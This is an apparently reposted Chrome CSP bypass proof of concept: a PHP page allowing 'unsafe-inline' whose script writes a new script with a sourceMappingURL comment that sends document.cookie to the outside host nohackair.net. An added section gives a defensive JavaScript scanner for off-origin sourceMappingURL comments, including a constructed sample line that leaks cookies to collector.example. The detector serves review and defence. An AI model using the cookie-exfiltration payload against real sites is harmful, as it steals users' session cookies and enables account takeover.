Chrome CSP bypass @长短短 (unsafe-inline)

From Twitter @长短短

<?php
// Policy under test: same-origin default, but inline scripts are allowed via 'unsafe-inline'.
header("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';");
?>
<html>
<meta charset="utf-8">
<body>
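<script>
// Writes a second inline script whose trailing sourceMappingURL comment points at an
// external host, with the escaped document.cookie in the query string.
document.write("<script>"+`ffff=1//# sourceMappingURL=http://nohackair.net/?${escape(document.cookie)}`+"<\/script>")
</script>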
</body>
</html>

TESTED IN THE LATEST CHROME
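
A review-time check for the pattern in the PoC above, added here as an example and not part of the original post: it scans script text for sourceMappingURL comments that resolve off-origin and notes when the URL is built with template interpolation. The function name, the sample lines and the `*.example` / `*.test` hosts are constructed for illustration.

```javascript
// Added example: flag sourceMappingURL comments that resolve to another origin.
// Covers "//# ", legacy "//@ " and "/*# ... */" comment forms.
const SOURCE_MAP_RE = /(?:\/\/|\/\*)[#@][ \t]*sourceMappingURL=([^\s'"`*]+)/g;

function findOffOriginSourceMaps(scriptText, pageOrigin) {
  const origin = new URL(pageOrigin).origin; // normalise, e.g. drop a trailing slash
  const findings = [];
  for (const match of scriptText.matchAll(SOURCE_MAP_RE)) {
    const raw = match[1];
    let resolved;
    try {
      // Relative references resolve against the page, as the browser would do.
      resolved = new URL(raw, origin + "/");
    } catch (e) {
      findings.push({ raw, host: null, dynamic: raw.includes("${"), reason: "unparseable" });
      continue;
    }
    // data: maps are embedded in the script and cause no network request.
    if (resolved.protocol === "data:") continue;
    if (resolved.origin !== origin) {
      findings.push({
        raw,
        host: resolved.host,
        // "${" means page data is interpolated into the URL when the script runs.
        dynamic: raw.includes("${"),
        reason: "off-origin",
      });
    }
  }
  return findings;
}

// Constructed sample input (single-quoted so "${...}" stays literal text).
const SAMPLE = [
  'a=1//# sourceMappingURL=http://collector.example/?${escape(document.cookie)}',
  'b=2//# sourceMappingURL=/static/app.js.map',
  'c=3//@ sourceMappingURL=https://app.example.test/maps/c.map',
  'd=4/*# sourceMappingURL=data:application/json;base64,e30= */',
].join("\n");

for (const f of findOffOriginSourceMaps(SAMPLE, "https://app.example.test")) {
  console.log(`${f.reason}: ${f.raw} (host=${f.host}, dynamic=${f.dynamic})`);
}
```

Run it over rendered templates or stored user content during review; only the first constructed line is reported, because the relative, same-origin and data: maps are not off-origin requests.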